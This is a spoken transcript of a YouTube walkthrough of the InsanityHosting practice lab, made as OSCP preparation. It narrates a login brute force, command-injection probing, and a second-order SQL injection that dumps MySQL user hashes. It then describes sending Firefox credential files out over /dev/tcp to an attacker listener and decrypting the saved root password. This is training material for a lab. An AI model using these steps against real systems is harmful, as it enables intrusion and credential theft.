What's going on, YouTube? Welcome back to another video. In today's video, we are doing InsanityHosting from Proving Grounds Play. Now, this is a part of TJ Null's OSCP prep, so that's why we're doing it today. And this is a hard difficulty box. Now, I believe this is a hard difficulty box because you sort of need to chain a couple things together in order to get to an end result, right? Or to get on the box, and then from there, sort of just understand how a certain browser or application works and the vulnerabilities within it, and then you can go ahead and exploit that to get root on the box. So this has a little bit of everything, and that's why I really enjoyed it. Got to learn a couple new things, but without further ado, let's go ahead and get right into it. So let's go ahead and start off with an Nmap scan. So let's do sudo nmap techsc for default scripts, techsv to enumerate the versions, techv to get some verbose output, and techon to put into a file, call it initial, and go ahead and put this IP address. So here we can see that we have 3 ports open. We have 21, which is FTP, we have 22, which is SSH, and we have 80, which is HTTP. So once this finishes, we can go ahead and look at the ports more in depth. Should be done any second now. And there it is. So we could do less enum initial. And it looks like we have 21, which is FTP. This is 3.0.2. We do have anonymous FTP login. We do have SSH on here, OpenSSH 7.4, but we don't have a server banner. Although if we look down here in port 80, which is HTTP, it tells us that it's CentOS. So I'm assuming that this is a CentOS box and also, or a Linux box, right? We also know that we have Apache here and we have PHP running on the backend. So let's go ahead and take off, or check off the easiest thing to check out first, which is going to be anonymous FTP. So let's go ahead and do FTP with this IP address. We can do anonymous. And we log in. So let's do ls. We can see that we have a pub directory here. We can go in there and ls, and we don't have anything in here. We can try passive mode off. Sometimes that works, and no, it doesn't look like we have much. Now, this, to me, is a rabbit hole of some sort, unless this directory is used within the web application. Maybe we upload a reverse shell or something like that, and then are able to access it through the web application, and that's how we get a shell. But for now, there's nothing in here of use, so we're going to go ahead and exit out of here and go from there. So let's go ahead and check out that HTTP server on port 80. So we can go ahead and put in the IP address, and here we are on a sort of server hosting website. This is a website that's sort of promoting a server hosting service or a server monitoring service. And so we can check out different links here that they have. This is what makes them different. Choose your server. These are all dead links. You can see on the bottom left, the little hashtag is just like a placeholder for something that you want to add further functionality to later on. We can see that we have a get started button here for the free server monitoring for everybody. And it actually goes to a /monitoring. If we click on here, we see that we get a login page. We can try admin. Don't have anything there. Also, before we continue here, let's go ahead and set up a directory brute force. Let's do FFUF tech u http:// with this IP address, and then we can do fuzz, and we can do word list of OffSec list discovery web content, and let's do raft small words dot text. Okay, cool. We don't have to really filter for anything. We just let it run. And we have a couple things going on here already. We have data, we have news, we have webmail, and phpMyAdmin. So these are a couple things that we can go ahead and check out. We have monitoring and license. So other than that, while that loads, we can, while that runs, sorry, we can go ahead and see if we can log into this panel. Let's see, admin and password, maybe. It doesn't seem to be doing much. Maybe we can come back. Let's see if we look at the source, if we can identify anything here. It doesn't look like it. This might just be like a JavaScript like login panel. It might not be an actual like CMS or any content management service that is running this. So what we can do is let's go check out some of these listings here, right? Actually, hold on. I'm going to make this a little bit cleaner. Let's go ahead and take this off. Let's do directory list 2.3. Is it lowercase? There you go, lowercase medium. Then we can filter for lines of 480 right here. We'll do 480. And here we got a couple things. These are the same things that we've seen, with just a little bit cleaner without all that extra stuff. So let's go ahead and check out the news portion. Let's do news. And it looks like we have a sort of company news blog, right? And they're just telling us that our team have been working hard to create you a free monitoring service for your servers. A special thank you to Otis. So it looks like we have a username here that we can go ahead and do and put in our notes. So let's do cd creds and then bi creds. And we can go ahead and put Otis right there. And we can go from there. Let's see what we have here. So if we hover over this monitoring service portion, we can see in the bottom left that it's like redirecting us to a www.insanityhosting.vm. So we can go ahead and put that into our host file. So let's do sudo vi etc hosts like that. There you go. And then we can go ahead and put in the IP address with www.insanityhosting.vm, just like that. And we can try and go here. Let's do http.vm. Okay, so it looks like it just changes it up a little bit and makes it look a little bit nicer and cleaner. Although these three functions up here are all for what this is being run on, which is blooded. And so all these social media handles are for them. Now, all we have from here is the username of Otis. There's nothing really much else that we can get from here unless we need to do some phishing with this email. Although it's very unlikely because we didn't really see any like SMTP or POP3 or IMAP. So that might not be the way this box is intended, right? So let's go ahead and check out the next thing, which is going to be data. Let's go ahead and grab that. We do data. And we have a version right here. So we can click on this and we can see that there's a version of 1.14.0. Go ahead and copy this and we can do cd loot. Let's go back, cd loot and vi note. We could do version and this, just in case we need that in the future, although we don't know what that version is for. We also have this empty that goes to the same thing. So let's go ahead and go back and see what else we can do. We have this webmail. So we can go there and see what that holds. Webmail. Okay, so we have a squirrel mail login. This is a sort of open source, how do you say, like inbox of some type. And we can do grab the version and we can do exploit to see if there's anything that we can take advantage of. And we have this squirrel mail remote code execution. Although, if you scroll down, you can see that this is authenticated. Although it's using the default user and password. We can try that out to see if we have that. Let's do sq user and sq pass. And we don't have that. So this is not going to work for us right now, although we might be able to use it in the future. But before we do that, we need to find some credentials. So we can try admin password here. Nope, we can try admin. Hello. And that doesn't seem to work either. So the next thing I thought about doing, right, is let's go to the monitoring section. Go to free monitoring and then go to the get started. And we have this login page, right? So the next thing I thought about doing was grabbing Otis's username and trying to brute force the login on this. Although while I was doing that, I found a little bit of unique behavior when it came to actually doing that brute force. Now, in order to get the sort of visual cue that you got a successful login, I sort of had to clear the cache because I guess when you go to log in here, and even if you put a random username and password and you click sign in, it automatically gives you a session, right? And that session, once it is like a valid password, a valid username and password that gets sent through here, it'll automatically redirect you to the dashboard no matter what like username or password you put after that specific request. That sounds so hard to understand, but I'll show you right now. So let's go ahead and delete these cookies. We'll go ahead and refresh this. Actually put on burp now. Not going to do that. Let's go ahead and make sure that, okay, yeah, this, I want to close this. And let's, oh, dude, there you go. All right, cool. So that's cleared. We have this, and we want to open up burp. So we can do next, start burp. And we can go to proxy, intercept on, and then put anything random, sign in. And here you can see that we don't have a cookie or a session that's valid here, right? Or that's being passed at least. So in this case, we can go ahead and send this to intruder. We can go to intruder, and then we can go ahead and put otis with the password parameter or the payload parameter added here. And then we can do a sniper attack, considering it's one payload. And we can go ahead and go to the top 1,000 passwords. And the reason for this is because this is Burp Community Edition. The intruder option or functionality on this is not that great because there's no threading. It's not as fast as you would like it to be to test everything that you want for a big and like 14 million word what do you say, like a word list like Rocky, right, for example. So we're just going to grab the top 1,000. Let's go ahead and turn off burp here, and we can go to this one. And we have them right here. So we can click raw, control A, control C, and paste right here. And then we're going to want to go to the settings, right? Scroll down a bit. You can go ahead and clear this grep match. And we can, right here in the redirections, we can go to on-site only. Scroll up, and we can go ahead and start the attack from here. Click OK. And right here. So we can see here that the redirects followed. There's 2 here, which is the only seemingly different thing or different sort of like visual cue that you can see amongst everything else. All the lengths are different. All the response received are different. The status code, are the same. These are practically the same. These status codes are the same. And so this is the only one that when I was looking at this, it looked pretty reasonable, right? And so I come in here into the actual request, and you can see the response. Then you see the second request, see the second response. And then right here, I believe if we go to, hold on, let's see. Right here, login.php, it goes to the monitoring index.php. So if we grab this password right here, 1234556, we come back here, we'll go to the monitoring service, take off burp, and we do otis with 1, 2, 3, 4, 5, 6. Click enter. We get into the dashboard. Now, the weird part was when I tried to, let's go back. Let's do, for example, if we took this off and we tried a random thing like this. Let's go ahead, go here to intruder. We'll stop this and we'll close it. We'll go back to the proxy, turn it on, sign in. Oh, turn on burp, sign in. Here we have a cookie, right? Here we have a session. So let's go ahead and send this session to intruder. Then we can do the same exact thing, otis, with this password parameter. Then we can go to the payloads, paste this payload, settings, clear this, and go to on-site only, and then go ahead and start this. And you can see right here that the redirects followed is only 1. And it's weird because if I go to, let's say this one, for example, we can see here in the response to that we're actually in the dashboard with this UI dashboard. And so even this is the wrong password, oddly enough, because this is the right password here, this uses the same cookie that we have, and it just automatically sort of sends the redirect to the UI dashboard. I am not sure why. Like, honestly, I'm not sure why, but it's weird because if you had that cookie already like instilled in your session, then this method wouldn't have worked for you. So odd behavior. I have no idea why it was doing that. So if someone understands a little bit more than me, I'd be happy to discuss it in the comments, you know? So nonetheless, let's get moving. We can go ahead and turn off burp suite. We can go ahead and move on. Let's do otis with 1, 2, 3, 4, 5, 6. And we have this monitoring control or a monitored server dashboard. And so here we have a local host and an IP address and the last checked with the status. Now we can modify this, although it says right here below other servers that you have set to monitor. If a server is down, we will email you a notification along with the report of the downtime. So it's saying email you a notification. That being said, we did find a sort of mail client, which was the webmail directory up here. So we can go ahead and duplicate this. Let's go to webmail and let's try otis with the same password to see if he reused the password, which he did. And that's great for us, but we can come back here and we can see if, I'm assuming this is using ping, right? Or ICMP packets in order to check if a host is up or down, or if it can reach it, and then it'll just tell the server if it's up or down, and then send us an email about it, right? So let's see, what if we tried a command injection, right? We can try who am I or ID, something like that. Although I don't think that this is going to work because we don't have access to the actual command that it's running with bash. So for example, right, if we came back to here, we close this out and we did a ping tag C 10 on $IP, right? For example, if we had access to this actual command in the dashboard, we can go ahead and put a semicolon like this and do who am I like that to inject a command. And once this command is executed, if it's executed, I believe this means if it's executed successfully, then we will run this command right after, just like this. So this, actually, never mind. This didn't execute, how do you say it? This didn't execute like successfully. Yeah, this didn't execute successfully, although it did run the second command right here, and you can see who we are, right? Although I don't think this is going to work. We can save it and we can try it out, and we can wait each minute. I'm assuming that this goes every minute and it checks it. So we can come here, we can click refresh, and we can see, when was this last checked? 03. Okay. So we just have to wait till like 04, and then we can come here and see if we have an email. So let me go ahead and pause the video, and then when it's done, I'll come back. All right, so we're back, and it's been a minute. You can see up here it's 104. We can come back to the squirrel mail, and we see that we have a warning here. We can click on this warning, and we can see that localhost is actually down. I'm assuming that that's because we added an invalid host here, or an invalid IP address. So we can go ahead and modify this. What happens if we put nothing here, right? Let's go ahead and save this. And I'm assuming that once we put nothing here, once it's checked, the status will be down, and then we'll get an email about it. And if that's the case, we can actually force emails to be sent to us, which is a good thing. And now, another thing to note, right? When I come into this warning, I'm seeing here that this is the report that it was mentioning right here, the report of the downtime, right? And this to me looks like it's being taken from a database, only because these look like different columns within a database, and these are the values. We have the ID, we have the host, we have the date and time, and then we have the status. So one viable option might be to try SQL injection to see if we can possibly extract data from the database. So that being said, let me go ahead and refresh this. It's 105. We can go ahead and refresh this, and we get a message here. Localhost is down. That's a good thing. So that means that we can indeed force, force emails to be sent to us, right? And so what we're going to do, right? Let's go ahead and open up Burp Suite. Actually, let's go ahead and click modify here first. And let's do, or actually, I'm sorry. Let's do this. We can go ahead and click on the add server, or add new down here. And we want to go ahead and send this to Burp Suite. Let's go ahead and do this. Let's come over here to Burp Suite, turn it on and off. Name it anything with nothing, click save, and here we are. Awesome. So let's go ahead and send this to repeater. Control R and Control Shift R. And here in the name parameter, we can see if we can inject any SQL. So let's do a quote, and then we could do or 1 equals 1 with a comment like that. Let's go ahead and URL encode this, and we can go ahead and send it. We can follow the redirection, and if we scroll down a little bit, let's see if we have it here. We do. We have a server of quote or 1 equals 1 with a comment, and we can see if we get anything from this. Now, remember, we did add no IP address, and there is no original name because this is a brand new addition. So, number one, the no IP address is going to force the email to us, and this name is going to sort of being injected into the select statement of whatever query it's running on the backend. So let's see if we can go ahead and extract that. So we have this here. We have still localhost. Okay, this is interesting, right? If you see here, we have a quote or 1 equals 1 with this comment here. And this is giving us all of the local host sort of down or reports, right? All the reports from the database from localhost. So this means that I believe we do have SQL injection here. And just to test this a little bit further, let's go ahead and do a more in-depth query. let's go ahead and try a union select statement or a second order SQL injection. Let's do union and then select. And we know the number of columns right here, 1, 2, 3, and 4. So we can go ahead and come here and we can do 1, 2, 3, 4 with a comment like that. Go ahead and URL encode this, send it through. We get a response. We wait a minute. Let's go ahead and come back here. Let's see. So there, it's still that one. Let's see what time this come in. 09. All right, we're looking at 09. All right, there's 10. Here we have something. Localhost. Okay, here we go. And so it looks like we do have a union select statement that is injectable. Right here, you can see all of the injectable columns that we can put data into. So we have 1, 2, 3, and 4, 1, 2, 3, and 4. And so next thing, right, let's go ahead and enumerate the database. We know a path that we can have, right, or a path that we do have. So let's go ahead and enumerate the databases on the server. So let's go back here to burp and let's go ahead and change this to, let's go ahead and do schema underscore name. And then from information schema dot schemata dot, I believe this is the query. Go ahead and URL encode this and go ahead and send it through. And we wait now. Right. Still the same. I think we're going to have to wait another minute, so I'm just going to go ahead and pause the video and then I'll come back in a minute. All right, so it's been a couple minutes and I've been having a little bit of trouble getting it to sort of work again. So I thought maybe troubleshooting it a little bit might help or might even teach us something, right? So I'm going to come back here. I'm going to maybe try it with a name in front of it. And we have schema name and then 4 from information schema dot schemata. Now this should work, although I'm not maybe sure why. We can also try with a hashtag instead of the normal dash dash. We can follow the redirection. We can see here that's been added. Cool. So let's see if this brings back something. I believe we're going to have to wait another minute. All right, so we're back and we can see that we have a couple of warnings here. Let's go ahead and see what we have. So right here, we can see the information schema sort of lookup that we did. We have a MySQL, we have a monitoring information schema, and then performance schema. So the performance schema is only going to have the sort of reports that we're receiving from the monitoring service in the emails. The monitoring database is only going to have, I'm assuming, one credential, right? Which is going to be the otis credential. We can go ahead and try and see what else that is when we get there, right? But I'm curious about the MySQL database because I know for a fact that there are user credentials stored in here for the user that is running the SQL service. So what we can do is come up here. We can go to the MySQL database tables from the mariadb.com, the MySQL database tables right here. We can click on this and we can see all the tables in the MySQL database. If we scroll down to the bottom, we can see the mysql.user. We can click on this and we can see that there is a user field or user column, a password column up there, but there's also this authentication string, which normally is an MD5 string or like encrypted with MD5, although it is encrypted through the MySQL or a MySQL command, right? And then there is this password field. So what we can do from here is we can come back to the burp query here, or the burp requests, and we can change this up a little bit. We can change the schema name, right? Let's go ahead and remove this. So it's not going to be from information schema. It's going to be from mysql.user. And we're going to want the user, password, and authentication string. Is it an underscore or a dash? It's going to be an underscore. Awesome. So we can go ahead and use this. Let's go ahead and send it through. We have the 302 redirect. We can come back here, go back to the squirrel mail, reload, and see if we get it through. So this just happened right now. I'm going to wait a minute and then I'll come back when it's done. All right, it's been a minute. We can go ahead and refresh this. We have 5 now. And here we have something, right? This is our query that we just did. And there seems to be no password. So we only have the user and we have the authentication string. So what we can do, we have this Elliot and we also have this root. We can grab this MD5 sum here, go to crackstation, online password cracking, Control V, and we get this Elliot123. Go ahead and copy that. Let's go over to CD creds, vi creds, and we can do 1, 2, 3, 4, 5, 6, and we could do Elliot with this password. Let's go ahead and see if we can crack root's password. Oops. Grab this. Back here. Paste that in. And we don't have anything. All right, cool. So let's go ahead and try these credentials. Let's see if we have access to the box now. So we could do SSH Elliot at sanity. Well, I'll just do the IP address. Yes. With this password. And we get in on the box. Awesome. So we have the local.txt here, right? So we can cat it out if you want to. wc.c-c local. We have this. And so we want to do a little bit more enumeration, right? So one thing that we can do is we can do ID. We can see if we're part of any groups. We can do SSNLTP. We know that, where is it? MySQL is running here. We have this SMTP server. We also have this port 9000, which I'm not 100% sure what it is. Do we have netcat on here? No. I might, if I don't find anything else, we might use Chisel to forward this to our box and then check it out like that. Although other than that, we have, let's see, what else? We can cat etc pass wd and grep for sh. Let's try anything that ends in sh. We have a couple of users here. We have root, admin, Nicholas, Elliot, which is us, and we have a monitor. Let's go ahead and do cd/home. /la. Let's see, can we go into any of these? We do not. We don't have access to any of these, other than ourselves, of course. Let's see, what else? What else? Let's go to var www. Let's see what we have here. We have the HTML, which is the, okay, this is the web server that we had. Let's see, monitoring, cron.php. Hold on, let's cat this login.php. Okay, so this is just the login page that they had in the monitoring service. Let's go ahead and check out this cron.php. see if there's any credentials in here. Doesn't look like it. Now this is the string. So this is select all from monitoring.hosts, inner join monitoring.users, and then the user ID to the user ID. There is a database and a config.php. Let's see what we have here. Let's do find dot and then cat or grep config. Settings config.php, cat this. So we do have a password here. This is for the database. Let's see, mysql. Oh, so I guess we can use it with no password. Oh, but there's nothing in here, of course. Let's go ahead and exit this. We can go ahead and try to see if this is root's password. No, we can do su nick. Is it less? Is it like that? Or Nicholas? So su Nicholas, this password. No, su admin, this password. And it doesn't look like we have anything there. Let's go into our home directory. Let's go into Elliot. Let's see what else we have in here. Okay, I was looking for maybe a bash history. Oh, we do have Mozilla, which is Firefox, and Firefox does actually store credentials, encrypted credentials, if the user has logged in on the box. So let's go ahead and see. Let's go in there. .mozilla. There you go. We have a Firefox. CV Firefox. CD ES here. And let's see. Let me see if we can find a script. Firefox password decrypt. Let's see. GitHub. We have this one, which is fire pwd. Let's see what we got here. Okay, so what are we looking for? We have a key3.db and signons.sqlite. Let's see what we have. We can, we have a key4.db, which is right here, the key4.db, and then we need the logins.json. Do we have that? Yeah, we do, right here. Okay, cool. So if we cat logins.json, we can see that there are encrypted password right here and encrypted username right here. So we can use these two files in order to decrypt it with this script here. So let's go ahead and copy this. We'll go to our local machine. We'll do cd privesc and then git clone on this. Let's do cd into fire pwd and pip3 install -r requirements. Go ahead and install that. And then we could do python 3 fire pwd. Cannot find key 4 or key 3. Okay. So one way that we can, considering these boxes are normally not connected to the internet, even if, let's see, we don't have Python 3, which Python? We do have Python. Even if we could stand up a Python server on here, we really wouldn't be able to download it because this is not connected to the internet. We wouldn't be able to grab it from our local box like that. So one other way that we can do it is through netcat. So we can do cat login.json and then direct it to dev TCP 192, which is our IP address, 45.151.9999, and then 02 and 1, like that. We could do ncnvlp 9999 and direct that into .json, like that. Go ahead and set this up and send it through. Oh. Tech NVLP. There you go. Let's go ahead and redo this. And we get a connection and we have a logins.json. Then we can go ahead and do that same exact thing with the key4.db. Go ahead and name it key4.db, enter, and send it through. We have key4.db right here. And all we have to do now, let's go ahead and move this up a little bit. We can go ahead and do Python 3, fire pwd, enter. And right here at the bottom, we can see that for the username root, which was the encrypted username, we have the password of this, or the unencrypted password now of this long string. So what we can do is, let's do su root with this password, and we are root on the box. So that was a pretty cool box. We can do cd root and get the proof.txt and go from there. If you guys enjoyed, leave a like, comment, and subscribe if you would like to see more videos like this. Hope you guys learned something, and I'll see you guys in the next one.